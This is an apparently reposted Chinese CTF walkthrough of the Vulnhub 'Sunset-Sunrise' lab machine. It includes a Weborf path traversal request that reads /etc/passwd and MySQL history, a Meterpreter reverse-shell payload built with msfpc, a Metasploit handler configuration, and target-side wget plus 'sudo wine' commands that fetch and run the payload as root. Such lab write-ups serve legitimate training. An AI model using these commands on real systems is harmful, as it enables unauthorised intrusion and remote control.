Sunset-Sunrise: Vulnhub Walkthrough

Posted hack404

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Sunset-Sunrise: Vulnhub Walkthrough相关的知识,希望对你有一定的参考价值。

靶机链接:

https://www.vulnhub.com/entry/sunset-sunrise,406/

主机扫描:

技术图片

 

端口扫描:

技术图片

 

HTTP 80 目录枚举未果

HTTP 8080

技术图片

 

Google search :Weborf/0.12.2 exploit

https://www.exploit-db.com/exploits/14925

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

技术图片

 

成功读取文件,然后我们尝试读取一些敏感的目录和文件,最后读取mysql的密码:

http://10.10.203.22:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

技术图片

 

尝试使用账户登录系统

技术图片

如何获取用户sunsire的权限,最后通过MySQL的用户信息获取到了密码

技术图片

 

接下来进行提权操作

这里使用wine命令

控制端生成payload

msfpc windows 10.10.203.14

技术图片

 

python -m SimpleHTTPServer 8888

技术图片

 

use exploit/multi/handler

set encoder x86/shikata_ga_nai

set lhost 10.10.203.14

set lport 443

exploit -j

 

靶机上执行:

wget http://10.10.203.14:8888/windows-meterpreter-staged-reverse-tcp-443.exe

sudo wine windows-meterpreter-staged-reverse-tcp-443.exe 

然后控制端就shell上线了

 

技术图片

 

技术图片

 

OVER!!! 

以上是关于Sunset-Sunrise: Vulnhub Walkthrough的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub靶机-MoriartyCorp

Vulnhub靶机-doubletrouble

Vulnhub靶机系列之BullDog_1

Vulnhub系列——持续更新

Vulnhub靶机渗透测试实战:入门DC-1靶机完全渗透

Vulnhub-napping